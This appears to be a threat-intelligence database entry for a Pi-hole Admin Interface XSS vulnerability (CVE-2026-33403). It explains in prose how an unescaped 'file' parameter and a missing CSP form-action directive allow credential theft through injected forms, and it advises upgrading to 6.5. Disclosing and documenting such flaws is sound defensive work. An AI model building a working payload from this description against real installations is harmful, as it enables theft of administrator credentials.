CVE-2026-33403: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in pi-hole web
Pi-hole Admin Interface is a web interface for managing Pi-hole, a network-level ad and internet tracker blocking application. From 6.0 to before 6.5, a reflected DOM-based XSS vulnerability in taillog.js allows an unauthenticated attacker to inject arbitrary HTML into the Pi-hole admin interface by crafting a malicious URL. The file query parameter is interpolated into an innerHTML assignment without escaping. Because the Content-Security-Policy is missing the form-action directive, injected <form> elements can exfiltrate credentials to an external origin. This vulnerability is fixed in 6.5.
AI Analysis
Technical Summary
CVE-2026-33403 is a reflected DOM-based XSS vulnerability in the Pi-hole Admin Interface web application affecting versions 6.0 through 6.4. The vulnerability occurs because the 'file' query parameter is directly interpolated into an innerHTML assignment in taillog.js without proper escaping. The absence of a form-action directive in the Content-Security-Policy allows injected <form> elements to exfiltrate credentials to external origins. This vulnerability enables an unauthenticated attacker to inject arbitrary HTML via a crafted URL. The vulnerability has a CVSS 3.1 base score of 6.1 (medium severity) and is fixed in Pi-hole version 6.5.
Potential Impact
An unauthenticated attacker can exploit this vulnerability to inject arbitrary HTML into the Pi-hole admin interface, potentially leading to credential theft via malicious forms. The vulnerability impacts confidentiality and integrity but does not affect availability. Exploitation requires user interaction (clicking a crafted URL). There are no known exploits in the wild as of the published date.
Mitigation Recommendations
This vulnerability is fixed in Pi-hole version 6.5. Users should upgrade to version 6.5 or later to remediate this issue. Since no official patch links or vendor advisory text is provided, confirm the upgrade from the official Pi-hole release notes or repository. No additional mitigations are indicated.
CVE-2026-33403: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in pi-hole web
Description
Pi-hole Admin Interface is a web interface for managing Pi-hole, a network-level ad and internet tracker blocking application. From 6.0 to before 6.5, a reflected DOM-based XSS vulnerability in taillog.js allows an unauthenticated attacker to inject arbitrary HTML into the Pi-hole admin interface by crafting a malicious URL. The file query parameter is interpolated into an innerHTML assignment without escaping. Because the Content-Security-Policy is missing the form-action directive, injected <form> elements can exfiltrate credentials to an external origin. This vulnerability is fixed in 6.5.
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
CVE-2026-33403 is a reflected DOM-based XSS vulnerability in the Pi-hole Admin Interface web application affecting versions 6.0 through 6.4. The vulnerability occurs because the 'file' query parameter is directly interpolated into an innerHTML assignment in taillog.js without proper escaping. The absence of a form-action directive in the Content-Security-Policy allows injected <form> elements to exfiltrate credentials to external origins. This vulnerability enables an unauthenticated attacker to inject arbitrary HTML via a crafted URL. The vulnerability has a CVSS 3.1 base score of 6.1 (medium severity) and is fixed in Pi-hole version 6.5.
Potential Impact
An unauthenticated attacker can exploit this vulnerability to inject arbitrary HTML into the Pi-hole admin interface, potentially leading to credential theft via malicious forms. The vulnerability impacts confidentiality and integrity but does not affect availability. Exploitation requires user interaction (clicking a crafted URL). There are no known exploits in the wild as of the published date.
Mitigation Recommendations
This vulnerability is fixed in Pi-hole version 6.5. Users should upgrade to version 6.5 or later to remediate this issue. Since no official patch links or vendor advisory text is provided, confirm the upgrade from the official Pi-hole release notes or repository. No additional mitigations are indicated.
Technical Details
- Data Version
- 5.2
- Assigner Short Name
- GitHub_M
- Date Reserved
- 2026-03-19T17:02:34.170Z
- Cvss Version
- 3.1
- State
- PUBLISHED
- Remediation Level
- null
Threat ID: 69d3ce180a160ebd92c09ccb
Added to database: 4/6/2026, 3:15:36 PM
Last enriched: 4/6/2026, 3:31:08 PM
Last updated: 4/7/2026, 7:07:14 AM
Views: 5
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.